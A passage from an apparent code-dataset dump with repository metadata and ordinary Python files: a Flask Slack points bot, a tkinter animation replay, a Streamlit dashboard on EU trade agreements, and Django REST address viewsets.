] | 3 | 2017-10-31T22:56:14.000Z | 2017-11-01T21:04:49.000Z | pointy/__init__.py | AlexLloyd0/pointy-mcpointface | 2c5f3edf14a1d3821933ba8daa3fd616366055a0 | [
"MIT"
] | null | null | null | import json
import logging
import os
from flask import Flask, request, jsonify
from pointy.api.add_points import add_points
from pointy.api.add_team import add_team
from pointy.api.add_user import add_user
from pointy.api.get_score import get_score
from pointy.api.get_scoreboard import get_scoreboard, get_scoreboard_page
from pointy.setup_logging import setup_logging
setup_logging()
logger = logging.getLogger(__name__)
app = Flask(__name__)
verify_token = os.environ.get('POINTY_VERIFY_TOKEN')
@app.route('/add-points', methods=['POST'])
@app.route('/get-score', methods=['POST'])
@app.route('/get-scoreboard', methods=['POST'])
@app.route('/add-team', methods=['POST'])
@app.route('/event-endpoint', methods=['POST'])
@app.route('/interactive-endpoint', methods=['POST'])
@app.route('/oauth-redirect', methods=[''])
| 30.257732 | 113 | 0.687223 | import json
import logging
import os
from flask import Flask, request, jsonify
from pointy.api.add_points import add_points
from pointy.api.add_team import add_team
from pointy.api.add_user import add_user
from pointy.api.get_score import get_score
from pointy.api.get_scoreboard import get_scoreboard, get_scoreboard_page
from pointy.setup_logging import setup_logging
setup_logging()
logger = logging.getLogger(__name__)
app = Flask(__name__)
verify_token = os.environ.get('POINTY_VERIFY_TOKEN')
@app.route('/add-points', methods=['POST'])
def add_points_route():
    """Slash-command endpoint for `/points`: award points to a user."""
    payload = request.form
    # Reject requests that don't carry Slack's shared verification token.
    if payload.get('token') != verify_token:
        return "Incorrect verification token", 403
    if payload.get('command') != '/points':
        return "Invalid command"
    return jsonify(add_points(payload))
@app.route('/get-score', methods=['POST'])
def get_score_route():
    """Slash-command endpoint for `/score`: report a user's point total."""
    form = request.form
    # Reject requests that don't carry Slack's shared verification token.
    if form.get('token') != verify_token:
        return "Incorrect verification token", 403
    if form.get('command') != '/score':
        return "Invalid command"
    return jsonify(get_score(form))
@app.route('/get-scoreboard', methods=['POST'])
def get_scoreboard_route():
    """Slash-command endpoint for `/leaderboard`: first page of the board."""
    form = request.form
    if form.get('token') != verify_token:
        return "Incorrect verification token", 403
    if form.get('command') != '/leaderboard':
        return "Invalid command"
    # Always start at the top of the board (offset 0).
    return jsonify(get_scoreboard_page(form, offset=0))
@app.route('/add-team', methods=['POST'])
def add_team_route():
    """Register a new Slack team/workspace."""
    form = request.form
    if form.get('token') != verify_token:
        return "Incorrect verification token", 403
    return jsonify(add_team(form))
@app.route('/event-endpoint', methods=['POST'])
def action_route():
    """Slack Events API endpoint: team joins, app uninstalls, URL verification.

    Events may arrive form-encoded or as a JSON body, so the verification
    token is accepted from either source.
    """
    form = request.form
    # json_ is only for url verification
    # `or {}` guards form-encoded requests, where get_json(silent=True)
    # returns None and `.get` would raise AttributeError.
    json_ = request.get_json(silent=True) or {}
    if form.get('token') != verify_token and json_.get('token') != verify_token:
        return "Incorrect verification token", 403
    if form.get('type') == 'team_join':
        return jsonify(add_user(form))
    if form.get('type') == 'app_uninstalled':
        # Fixed: raise NotImplementedError; the original raised the
        # NotImplemented singleton, which is not an exception and would
        # itself fail with a TypeError.
        raise NotImplementedError('Uninstalled app') # TODO
    if json_.get('type') == 'url_verification':
        # Echo Slack's challenge to confirm endpoint ownership.
        return jsonify({'challenge': json_.get('challenge')})
@app.route('/interactive-endpoint', methods=['POST'])
def interactive_route():
    """Slack interactive-message endpoint (e.g. scoreboard paging buttons)."""
    # Slack posts the action as a JSON string in the `payload` form field.
    payload = request.form.get('payload', {})
    try:
        form = json.loads(payload)
    except json.decoder.JSONDecodeError:
        return "Malformed payload", 400
    if form.get('token') != verify_token:
        return "Incorrect verification token", 403
    if form.get('callback_id') == 'leader_scroll':
        return jsonify(get_scoreboard_page(form))
    logger.info(str(form))
    # NOTE(review): unknown callback_ids fall through and return None, which
    # Flask treats as an error -- confirm whether an empty 200 is intended.
@app.route('/oauth-redirect', methods=[''])
def oauth_redirect():
    """Placeholder for the Slack OAuth redirect handler (not implemented).

    NOTE(review): ``methods=['']`` registers an empty HTTP method name --
    presumably this should be ``['GET']``; confirm before enabling the route.
    """
    pass
def main():
    """Run the Flask development server."""
    app.run()
# TODO https://blog.heroku.com/how-to-deploy-your-slack-bots-to-heroku#share-your-bot-with-the-heroku-button
| 1,917 | 0 | 177 |
ca40a55c661538e7cdefeeb691b340aad696816b | 232 | py | Python | routines/__init__.py | meteostat/routines | 8867b96a3fcb254ebcc9623933a76dac44157b70 | [
"MIT"
] | 7 | 2020-07-02T09:49:06.000Z | 2021-05-24T11:46:00.000Z | routines/__init__.py | meteostat/routines | 8867b96a3fcb254ebcc9623933a76dac44157b70 | [
"MIT"
] | 16 | 2021-03-29T19:45:01.000Z | 2021-11-14T11:39:12.000Z | routines/__init__.py | meteostat/routines | 8867b96a3fcb254ebcc9623933a76dac44157b70 | [
"MIT"
] | 1 | 2021-04-06T20:58:42.000Z | 2021-04-06T20:58:42.000Z | """
█▀▄▀█ █▀▀ ▀█▀ █▀▀ █▀█ █▀ ▀█▀ ▄▀█ ▀█▀
█░▀░█ ██▄ ░█░ ██▄ █▄█ ▄█ ░█░ █▀█ ░█░
Import & export routines.
The code is licensed under the MIT license.
"""
__appname__ = 'routines'
__version__ = '0.0.1'
from .routine import Routine
| 16.571429 | 43 | 0.482759 | """
█▀▄▀█ █▀▀ ▀█▀ █▀▀ █▀█ █▀ ▀█▀ ▄▀█ ▀█▀
█░▀░█ ██▄ ░█░ ██▄ █▄█ ▄█ ░█░ █▀█ ░█░
Import & export routines.
The code is licensed under the MIT license.
"""
__appname__ = 'routines'
__version__ = '0.0.1'
from .routine import Routine
| 0 | 0 | 0 |
2208401669715ecc10e5a867adce34cacc632295 | 77 | py | Python | rocky.py | Gewery/Pathfinders | 1ced94f3768d829318ec53f5aa8eb57b7a84e9e2 | [
"MIT"
] | null | null | null | rocky.py | Gewery/Pathfinders | 1ced94f3768d829318ec53f5aa8eb57b7a84e9e2 | [
"MIT"
] | null | null | null | rocky.py | Gewery/Pathfinders | 1ced94f3768d829318ec53f5aa8eb57b7a84e9e2 | [
"MIT"
] | 1 | 2018-08-17T12:07:46.000Z | 2018-08-17T12:07:46.000Z | import random
| 15.4 | 32 | 0.662338 | import random
def move(info, ctx=None):
    """Pick one of the four directions uniformly at random.

    Both `info` and `ctx` are accepted for interface compatibility but ignored.
    """
    directions = (0, 1, 2, 3)
    return random.choice(directions)
| 37 | 0 | 25 |
2d6b6eb80f38322fca3e11e158d98822aa0f5e99 | 1,678 | py | Python | moove.py | Sanchopanch/matrix | 16289a56688047f623b46de74f7f7f4380006d08 | [
"Apache-2.0"
] | null | null | null | moove.py | Sanchopanch/matrix | 16289a56688047f623b46de74f7f7f4380006d08 | [
"Apache-2.0"
] | null | null | null | moove.py | Sanchopanch/matrix | 16289a56688047f623b46de74f7f7f4380006d08 | [
"Apache-2.0"
] | null | null | null | import pickle
import os
from tkinter import *
import time
if __name__ == "__main__":
fileNameOfJob = 'mov_1.pkl'
if(not os.path.exists( fileNameOfJob)):
pass
with open(fileNameOfJob,'rb') as f:
currMoove =pickle.load(f)
print(' loaded moove with %i cadrs'%len(currMoove))
root = Tk()
canvas = Canvas(root, width=600+3, height=700+3)
canvas.pack()
canvas.create_rectangle(0, 0, 600+2, 700+2, fill="white")
cAlin=[]
cApo=[]
firstCadr =currMoove[0]
for lin in firstCadr.lines:
cA = canvas.create_line(lin[0], lin[1], lin[2], lin[3], fill="#555555", width = lin[4])
cAlin.append(cA)
for po in firstCadr.points:
cA = canvas.create_oval(po[0]-po[2], po[1]-po[2],po[0]+po[2],po[1]+po[2], fill="#FF5555")
cApo.append(cA)
for i,cadr in enumerate(currMoove):
currTime=time.time()
for lin in range( len(cadr.lines)):
if not cadr.lines[lin][5]:
canvas.coords(cAlin[lin], cadr.lines[lin][0], cadr.lines[lin][1], cadr.lines[lin][2], cadr.lines[lin][3])
else:
canvas.coords(cAlin[lin], 0, 0, 0, 1)
for po in range( len(cadr.points)):
large = cadr.points[po][2]
canvas.coords(cApo[po], cadr.points[po][0]-large, cadr.points[po][1]-large,cadr.points[po][0]+large, cadr.points[po][1]+large)
root.update()
time.sleep(1/250)
root.destroy()
| 27.064516 | 139 | 0.54112 | import pickle
import os
from tkinter import *
import time
class moove():
    """One animation frame: drawable lines and points plus a pause value.

    Presumably the class `mov_1.pkl` was pickled from, so its name and
    module location must stay as-is for `pickle.load` to resolve it.
    """
    def __init__(self):
        # Lines look like (x1, y1, x2, y2, width, hidden) and points like
        # (x, y, radius), based on how the replay loop indexes them -- confirm.
        self.points = []
        self.lines = []
        self.pause = 0
if __name__ == "__main__":
fileNameOfJob = 'mov_1.pkl'
if(not os.path.exists( fileNameOfJob)):
pass
with open(fileNameOfJob,'rb') as f:
currMoove =pickle.load(f)
print(' loaded moove with %i cadrs'%len(currMoove))
root = Tk()
canvas = Canvas(root, width=600+3, height=700+3)
canvas.pack()
canvas.create_rectangle(0, 0, 600+2, 700+2, fill="white")
cAlin=[]
cApo=[]
firstCadr =currMoove[0]
for lin in firstCadr.lines:
cA = canvas.create_line(lin[0], lin[1], lin[2], lin[3], fill="#555555", width = lin[4])
cAlin.append(cA)
for po in firstCadr.points:
cA = canvas.create_oval(po[0]-po[2], po[1]-po[2],po[0]+po[2],po[1]+po[2], fill="#FF5555")
cApo.append(cA)
for i,cadr in enumerate(currMoove):
currTime=time.time()
for lin in range( len(cadr.lines)):
if not cadr.lines[lin][5]:
canvas.coords(cAlin[lin], cadr.lines[lin][0], cadr.lines[lin][1], cadr.lines[lin][2], cadr.lines[lin][3])
else:
canvas.coords(cAlin[lin], 0, 0, 0, 1)
for po in range( len(cadr.points)):
large = cadr.points[po][2]
canvas.coords(cApo[po], cadr.points[po][0]-large, cadr.points[po][1]-large,cadr.points[po][0]+large, cadr.points[po][1]+large)
root.update()
time.sleep(1/250)
root.destroy()
| 73 | -7 | 52 |
a4fe50a6a59ef1524c840ac3e8ae35559b6538ac | 9,678 | py | Python | EDA/SRC/dashboard/app.py | PabloEduardoMartinezPicazo/Bootcamp-DataScience-2021 | 0fa5288aec5fb14e3796877882e4f1ddc5ad4aea | [
"MIT"
] | null | null | null | EDA/SRC/dashboard/app.py | PabloEduardoMartinezPicazo/Bootcamp-DataScience-2021 | 0fa5288aec5fb14e3796877882e4f1ddc5ad4aea | [
"MIT"
] | null | null | null | EDA/SRC/dashboard/app.py | PabloEduardoMartinezPicazo/Bootcamp-DataScience-2021 | 0fa5288aec5fb14e3796877882e4f1ddc5ad4aea | [
"MIT"
# Streamlit dashboard: "La importancia de los acuerdos comerciales internacionales".
# Renders one page per entry of the sidebar menu (cover page, definitions, case
# studies, raw dataframes, an API-backed table, conclusions, contact info).
# NOTE(review): indentation reconstructed from the control flow — confirm against
# the original file.  `st.beta_columns` is a deprecated Streamlit API.
import re
import streamlit as st
import pandas as pd
import numpy as np
import altair as alt
from PIL import Image
import requests
import sys,os
# Project root is three directory levels above this file; it is appended to
# sys.path so the `notebooks` and `SRC` packages below can be imported.
pato = os.path.dirname
direccion=pato(pato(pato(__file__)))
sys.path.append(direccion)
from notebooks.Canada import df_canada
from notebooks.Canada_2 import df_canada1
from notebooks.Japon import df_japon
from notebooks.Japon_2 import df_japon1
from notebooks.Vietnam import df_vietnam
from notebooks.Singapur import df_singapur
from notebooks.Corea import df_corea
from notebooks.Corea_aranceles import df_corea1
from notebooks.paisesfinal import df_paises
from notebooks.Aranceles import aranceles
from SRC.utils_.mining_data_tb import *
from SRC.utils_.visualization_tb import *
df = None
st.set_page_config(layout="wide")
# Sidebar page selector; each top-level `if menu == ...` block below is one page.
menu = st.sidebar.selectbox('Menu:',
                            options=["Portada", "Informacion básica", "Casos de estudio", "DataFrames","El datamama","Conclusiones","Información"])
st.title(' La importancia de los acuerdos comerciales internacionales')
# --- Cover page: headline charts loaded from pre-rendered PNG files ---
if menu == 'Portada':
    st.markdown('### En este estudio se pretende refutar la importancia de los acuerdos comerciales internacionales para el comercio de la Unión Europea.')
    st.write('¿Los acuerdos comerciales ayudan al comercio de la Unión Europea?: **SI**')
    st.markdown ("###### Fuentes: Comisión Europea, Datacomex, Eurostacom, ICEX y Access2Markets.")
    st.markdown('### Exportaciones UE - País / Importaciones País - UE')
    grafico1 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_exp_total.png')
    st.image (grafico1,use_column_width=True)
    st.markdown('### Importaciones UE - País')
    grafico2 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_totales.png')
    st.image (grafico2,use_column_width=True)
    st.markdown('### Exportaciones País - UE')
    grafico3 = Image.open(direccion + os.sep + 'resources' + os.sep + 'exp_totales.png')
    st.image (grafico3,use_column_width=True)
# --- Glossary of trade terms ---
if menu == "Informacion básica":
    st.markdown('## Definiciones')
    st.write ("1. **Acuerdo libre comercio:** acuerdo firmado por uno o varios países que lo que pretenden es mejorar el comercio entre ambos bloques a través de la eliminación de trabas arancelarias y no arancelarias.")
    st.write ("2. **Barreras no arancelarias:** aquellas que impiden el correcto comercio entre dos bloques económicos y que no son de índole arancelario. Entre ellas se encuentras los procedimiento de entrada, los procesos de registro del producto, de inspeccion sanitaria, etc.")
    st.write ("3. **Aranceles:** impuestos que se cobran por la entrada de bienes o servicios extranjeros en el mercado nacional de un determinado país.")
    st.write ("4. **Existen dos tipos de aranceles:** aplicados como un porcentaje del valor del bien o los que se les aplica un valor fijo por una unidad de medida establecida (por ejemplo una cantidad de toneladas, hectolitros, etc.)")
    st.write ("5. **Contingentes:** cantidad exenta de aranceles o a la que se le aplica un arancel menor. A partir de ese volumen los aranceles aumentan.")
    st.write ("6. **Clasificación arancelaria:** proceso por el que se asigna a cada mercancía un código numérico basado en ciertos criterios como son la naturaleza del producto o los países de origen y destino.")
    st.write ("7. **Taric:** clasificación arancelario usado por la Unión Europea.")
# --- Per-country case studies with plotly charts built by the SRC helpers ---
if menu == "Casos de estudio":
    submenu=st.sidebar.selectbox(label="País:",
                                 options=["Corea del Sur","Japón","Canadá"])
    if submenu=="Corea del Sur":
        st.markdown('## El caso coreano: reacción inmediata ')
        checkbox_graficas = st.sidebar.checkbox("Gráficas", value=True)
        checkbox_correlaciones = st.sidebar.checkbox("Correlaciones", value=True)
        if checkbox_graficas:
            st.write("Aumento en las exportaciones e importaciones de un **72,26%** y un **105,76%**, respectivamente. ")
            st.write ("Reducción de los aranceles: ")
            st.write ("- Reduccion mediana de las importaciones del 27% al 5%. ")
            st.write ("- Reduccion mediana de las exportaciones del 14% al 0%. ")
            col1, col2 = st.beta_columns(2)
            with col1:
                st.markdown('### Importaciones de Corea del Sur a la Unión Europea ')
                st.plotly_chart(importaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
            with col2:
                st.markdown('### Exportaciones de Corea del Sur a la Unión Europea ')
                st.plotly_chart(exportaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
        if checkbox_correlaciones:
            col1, col2 = st.beta_columns(2)
            with col1:
                st.markdown('### Aranceles 2011 ')
                st.plotly_chart(violin_pre(aranceles),use_container_width=True)
            with col2:
                st.markdown('### Aranceles 2020 ')
                st.plotly_chart(violin_post(aranceles),use_container_width=True)
    if submenu=="Japón":
        st.markdown('## El caso japonés: la larga marcha ')
        st.write ("Disminución en las exportaciones de un **-3,35%** y un aumento el **27,72%** de las importaciones.")
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Importaciones de Japón a la Unión Europea ')
            st.plotly_chart(importaciones_total(df_japon1,"Japón"),use_container_width=True)
        with col2:
            st.markdown('### Exportaciones de Japón a la Unión Europea ')
            st.plotly_chart(exportaciones_total(df_japon1,"Japón"),use_container_width=True)
    if submenu=="Canadá":
        st.markdown('## El caso canadiense: con x de mixta')
        st.write ("Aumento en las exportaciones e importaciones de un **41,59%** y un **141,80%**, respectivamente.")
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Importaciones de Canadá a la Unión Europea ')
            st.plotly_chart(importaciones_total(df_canada1,"Canadá"),use_container_width=False)
        with col2:
            st.markdown('### Exportaciones de Canadá a la Unión Europea ')
            st.plotly_chart(exportaciones_total(df_canada1,"Canadá"),use_container_width=False)
# --- Raw CSV previews per country ---
if menu == "DataFrames":
    submenu=st.sidebar.selectbox(label="País:",
                                 options=["Canadá","Corea del Sur","Japón","Singapur","Vietnam"])
    if submenu=="Canadá":
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Datos antes y despues acuerdo ')
            df1 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá1.csv",nrows=20)
            st.table(df1)
        with col2:
            st.markdown('### Datos completos')
            df = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá.csv",nrows=20)
            st.table(df)
    if submenu=="Corea del Sur":
        st.markdown('### Datos antes y despues acuerdo ')
        df2 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCorea_del_Sur_1.csv",nrows=50)
        st.table(df2)
    if submenu=="Japón":
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Datos antes y despues acuerdo ')
            df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón1.csv",nrows=50)
            st.table(df3)
        with col2:
            st.markdown('### Datos completos')
            df4 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón.csv",nrows=50)
            st.table(df4)
    if submenu=="Singapur":
        st.markdown('### Datos completos')
        df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioSingapur.csv",nrows=50)
        st.table(df3)
    if submenu=="Vietnam":
        st.markdown('### Datos completos')
        df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioVietnam.csv",nrows=50)
        st.table(df3)
# --- Table fetched from a local API endpoint ---
if menu == "El datamama":
    r = requests.get("http://localhost:8080/give_me_id?token_id=R70423563").json()
    df = pd.DataFrame(r)
    st.write(df)
# --- Conclusions page ---
if menu == "Conclusiones":
    st.markdown('## Conclusiones')
    st.write ("- Todos los tipos de acuerdos comerciales desde aquellos que son más ambiciosos hasta aquellos que son más conservadores ayudan a mejorar el comercio internacional.")
    st.write ("- La correlación entre las exportaciones e importaciones con respecto a los aranceles es inversa.")
    st.write ("- A mayor rapidez en la implantacion mayor aumento en el comercio internacional.")
    st.write ("- Las barreras arancelarias tienen un peso muy importante en el aumento o disminucion del comercio.")
    st.write ("- La comparación entre los países que han adpotado las medidas hace más tiempo y los que las han adoptado hace menos indica que el comercio entre los diferentes bloques se incrementa mucho más tras los acuerdos ")
    st.write ("- Las economías con mayor apertura comercial tienden a ser más dependientes del sector exterior que las economias protectoras.")
    st.write ("- Importante remarcar que hay una serie de variables no númericas (barreras no arancelarias) que tienen un gran impacto en el comercio, habría que hacer un análisis más profundo.")
# --- Contact / credits page ---
if menu == "Información":
    st.markdown("### Para más información:")
    st.write(" 1. [Linkedin](https://www.linkedin.com/in/pabloeduardomartinezpicazo/)")
    st.write(" 2. Correo electónico: pabloeduardo.martinezpicazo@gmail.com")
    Imagen_despedida= Image.open(direccion + os.sep + 'resources' + os.sep + 'agradecimiento.jpg')
    st.image (Imagen_despedida,use_column_width=True)
# Streamlit dashboard: "La importancia de los acuerdos comerciales internacionales".
# (Duplicate copy of the dashboard script from the dataset's original_content
# column; its leading `import re` — unused — is fused into the preceding
# residue line and is therefore not part of this span.)
# Renders one page per entry of the sidebar menu (cover page, definitions, case
# studies, raw dataframes, an API-backed table, conclusions, contact info).
# NOTE(review): indentation reconstructed from the control flow — confirm against
# the original file.  `st.beta_columns` is a deprecated Streamlit API.
import streamlit as st
import pandas as pd
import numpy as np
import altair as alt
from PIL import Image
import requests
import sys,os
# Project root is three directory levels above this file; it is appended to
# sys.path so the `notebooks` and `SRC` packages below can be imported.
pato = os.path.dirname
direccion=pato(pato(pato(__file__)))
sys.path.append(direccion)
from notebooks.Canada import df_canada
from notebooks.Canada_2 import df_canada1
from notebooks.Japon import df_japon
from notebooks.Japon_2 import df_japon1
from notebooks.Vietnam import df_vietnam
from notebooks.Singapur import df_singapur
from notebooks.Corea import df_corea
from notebooks.Corea_aranceles import df_corea1
from notebooks.paisesfinal import df_paises
from notebooks.Aranceles import aranceles
from SRC.utils_.mining_data_tb import *
from SRC.utils_.visualization_tb import *
df = None
st.set_page_config(layout="wide")
# Sidebar page selector; each top-level `if menu == ...` block below is one page.
menu = st.sidebar.selectbox('Menu:',
                            options=["Portada", "Informacion básica", "Casos de estudio", "DataFrames","El datamama","Conclusiones","Información"])
st.title(' La importancia de los acuerdos comerciales internacionales')
# --- Cover page: headline charts loaded from pre-rendered PNG files ---
if menu == 'Portada':
    st.markdown('### En este estudio se pretende refutar la importancia de los acuerdos comerciales internacionales para el comercio de la Unión Europea.')
    st.write('¿Los acuerdos comerciales ayudan al comercio de la Unión Europea?: **SI**')
    st.markdown ("###### Fuentes: Comisión Europea, Datacomex, Eurostacom, ICEX y Access2Markets.")
    st.markdown('### Exportaciones UE - País / Importaciones País - UE')
    grafico1 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_exp_total.png')
    st.image (grafico1,use_column_width=True)
    st.markdown('### Importaciones UE - País')
    grafico2 = Image.open(direccion + os.sep + 'resources' + os.sep + 'imp_totales.png')
    st.image (grafico2,use_column_width=True)
    st.markdown('### Exportaciones País - UE')
    grafico3 = Image.open(direccion + os.sep + 'resources' + os.sep + 'exp_totales.png')
    st.image (grafico3,use_column_width=True)
# --- Glossary of trade terms ---
if menu == "Informacion básica":
    st.markdown('## Definiciones')
    st.write ("1. **Acuerdo libre comercio:** acuerdo firmado por uno o varios países que lo que pretenden es mejorar el comercio entre ambos bloques a través de la eliminación de trabas arancelarias y no arancelarias.")
    st.write ("2. **Barreras no arancelarias:** aquellas que impiden el correcto comercio entre dos bloques económicos y que no son de índole arancelario. Entre ellas se encuentras los procedimiento de entrada, los procesos de registro del producto, de inspeccion sanitaria, etc.")
    st.write ("3. **Aranceles:** impuestos que se cobran por la entrada de bienes o servicios extranjeros en el mercado nacional de un determinado país.")
    st.write ("4. **Existen dos tipos de aranceles:** aplicados como un porcentaje del valor del bien o los que se les aplica un valor fijo por una unidad de medida establecida (por ejemplo una cantidad de toneladas, hectolitros, etc.)")
    st.write ("5. **Contingentes:** cantidad exenta de aranceles o a la que se le aplica un arancel menor. A partir de ese volumen los aranceles aumentan.")
    st.write ("6. **Clasificación arancelaria:** proceso por el que se asigna a cada mercancía un código numérico basado en ciertos criterios como son la naturaleza del producto o los países de origen y destino.")
    st.write ("7. **Taric:** clasificación arancelario usado por la Unión Europea.")
# --- Per-country case studies with plotly charts built by the SRC helpers ---
if menu == "Casos de estudio":
    submenu=st.sidebar.selectbox(label="País:",
                                 options=["Corea del Sur","Japón","Canadá"])
    if submenu=="Corea del Sur":
        st.markdown('## El caso coreano: reacción inmediata ')
        checkbox_graficas = st.sidebar.checkbox("Gráficas", value=True)
        checkbox_correlaciones = st.sidebar.checkbox("Correlaciones", value=True)
        if checkbox_graficas:
            st.write("Aumento en las exportaciones e importaciones de un **72,26%** y un **105,76%**, respectivamente. ")
            st.write ("Reducción de los aranceles: ")
            st.write ("- Reduccion mediana de las importaciones del 27% al 5%. ")
            st.write ("- Reduccion mediana de las exportaciones del 14% al 0%. ")
            col1, col2 = st.beta_columns(2)
            with col1:
                st.markdown('### Importaciones de Corea del Sur a la Unión Europea ')
                st.plotly_chart(importaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
            with col2:
                st.markdown('### Exportaciones de Corea del Sur a la Unión Europea ')
                st.plotly_chart(exportaciones_total(df_corea1,"Corea del Sur"),use_container_width=True)
        if checkbox_correlaciones:
            col1, col2 = st.beta_columns(2)
            with col1:
                st.markdown('### Aranceles 2011 ')
                st.plotly_chart(violin_pre(aranceles),use_container_width=True)
            with col2:
                st.markdown('### Aranceles 2020 ')
                st.plotly_chart(violin_post(aranceles),use_container_width=True)
    if submenu=="Japón":
        st.markdown('## El caso japonés: la larga marcha ')
        st.write ("Disminución en las exportaciones de un **-3,35%** y un aumento el **27,72%** de las importaciones.")
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Importaciones de Japón a la Unión Europea ')
            st.plotly_chart(importaciones_total(df_japon1,"Japón"),use_container_width=True)
        with col2:
            st.markdown('### Exportaciones de Japón a la Unión Europea ')
            st.plotly_chart(exportaciones_total(df_japon1,"Japón"),use_container_width=True)
    if submenu=="Canadá":
        st.markdown('## El caso canadiense: con x de mixta')
        st.write ("Aumento en las exportaciones e importaciones de un **41,59%** y un **141,80%**, respectivamente.")
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Importaciones de Canadá a la Unión Europea ')
            st.plotly_chart(importaciones_total(df_canada1,"Canadá"),use_container_width=False)
        with col2:
            st.markdown('### Exportaciones de Canadá a la Unión Europea ')
            st.plotly_chart(exportaciones_total(df_canada1,"Canadá"),use_container_width=False)
# --- Raw CSV previews per country ---
if menu == "DataFrames":
    submenu=st.sidebar.selectbox(label="País:",
                                 options=["Canadá","Corea del Sur","Japón","Singapur","Vietnam"])
    if submenu=="Canadá":
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Datos antes y despues acuerdo ')
            df1 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá1.csv",nrows=20)
            st.table(df1)
        with col2:
            st.markdown('### Datos completos')
            df = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCanadá.csv",nrows=20)
            st.table(df)
    if submenu=="Corea del Sur":
        st.markdown('### Datos antes y despues acuerdo ')
        df2 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioCorea_del_Sur_1.csv",nrows=50)
        st.table(df2)
    if submenu=="Japón":
        col1, col2 = st.beta_columns(2)
        with col1:
            st.markdown('### Datos antes y despues acuerdo ')
            df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón1.csv",nrows=50)
            st.table(df3)
        with col2:
            st.markdown('### Datos completos')
            df4 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioJapón.csv",nrows=50)
            st.table(df4)
    if submenu=="Singapur":
        st.markdown('### Datos completos')
        df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioSingapur.csv",nrows=50)
        st.table(df3)
    if submenu=="Vietnam":
        st.markdown('### Datos completos')
        df3 = pd.read_csv(direccion + os.sep + 'data' + os.sep + "csvlimpioVietnam.csv",nrows=50)
        st.table(df3)
# --- Table fetched from a local API endpoint ---
if menu == "El datamama":
    r = requests.get("http://localhost:8080/give_me_id?token_id=R70423563").json()
    df = pd.DataFrame(r)
    st.write(df)
# --- Conclusions page ---
if menu == "Conclusiones":
    st.markdown('## Conclusiones')
    st.write ("- Todos los tipos de acuerdos comerciales desde aquellos que son más ambiciosos hasta aquellos que son más conservadores ayudan a mejorar el comercio internacional.")
    st.write ("- La correlación entre las exportaciones e importaciones con respecto a los aranceles es inversa.")
    st.write ("- A mayor rapidez en la implantacion mayor aumento en el comercio internacional.")
    st.write ("- Las barreras arancelarias tienen un peso muy importante en el aumento o disminucion del comercio.")
    st.write ("- La comparación entre los países que han adpotado las medidas hace más tiempo y los que las han adoptado hace menos indica que el comercio entre los diferentes bloques se incrementa mucho más tras los acuerdos ")
    st.write ("- Las economías con mayor apertura comercial tienden a ser más dependientes del sector exterior que las economias protectoras.")
    st.write ("- Importante remarcar que hay una serie de variables no númericas (barreras no arancelarias) que tienen un gran impacto en el comercio, habría que hacer un análisis más profundo.")
# --- Contact / credits page ---
if menu == "Información":
    st.markdown("### Para más información:")
    st.write(" 1. [Linkedin](https://www.linkedin.com/in/pabloeduardomartinezpicazo/)")
    st.write(" 2. Correo electónico: pabloeduardo.martinezpicazo@gmail.com")
    Imagen_despedida= Image.open(direccion + os.sep + 'resources' + os.sep + 'agradecimiento.jpg')
    st.image (Imagen_despedida,use_column_width=True)
f0e198f4326950fbb0c36cb549ee304c117f89ff | 2,917 | py | Python | address/views_api.py | YangWanjun/areaparking | b08bc9b8f8d5f602d823115263b9d040edb9f245 | [
"Apache-2.0"
] | 1 | 2018-08-02T04:00:44.000Z | 2018-08-02T04:00:44.000Z | address/views_api.py | YangWanjun/areaparking | b08bc9b8f8d5f602d823115263b9d040edb9f245 | [
"Apache-2.0"
] | null | null | null | address/views_api.py | YangWanjun/areaparking | b08bc9b8f8d5f602d823115263b9d040edb9f245 | [
"Apache-2.0"
] | null | null | null | from rest_framework import viewsets
from rest_framework.filters import SearchFilter
from rest_framework.response import Response
from . import biz, models, serializers
from parkinglot.models import ParkingLot
from utils.django_base import BaseApiPagination
| 33.918605 | 103 | 0.696606 | from rest_framework import viewsets
from rest_framework.filters import SearchFilter
from rest_framework.response import Response
from . import biz, models, serializers
from parkinglot.models import ParkingLot
from utils.django_base import BaseApiPagination
class PrefViewSet(viewsets.ModelViewSet):
    """CRUD API endpoints for Pref records, filterable by code and name."""
    queryset = models.Pref.objects.public_all()
    serializer_class = serializers.PrefSerializer
    filter_fields = ('code', 'name')
class CityViewSet(viewsets.ModelViewSet):
    """Paginated CRUD API endpoints for City records, filterable by code and name."""
    queryset = models.City.objects.public_all()
    serializer_class = serializers.CitySerializer
    filter_fields = ('code', 'name')
    pagination_class = BaseApiPagination
class AzaViewSet(viewsets.ModelViewSet):
    """Paginated CRUD API endpoints for Aza records.

    Filterable by code, name and the owning city's code (``city__code``).
    """
    queryset = models.Aza.objects.public_all()
    serializer_class = serializers.AzaSerializer
    filter_fields = ('code', 'name', 'city__code')
    pagination_class = BaseApiPagination
class PostcodeViewSet(viewsets.ModelViewSet):
    """Paginated CRUD API endpoints for Postcode records, filterable by post_code."""
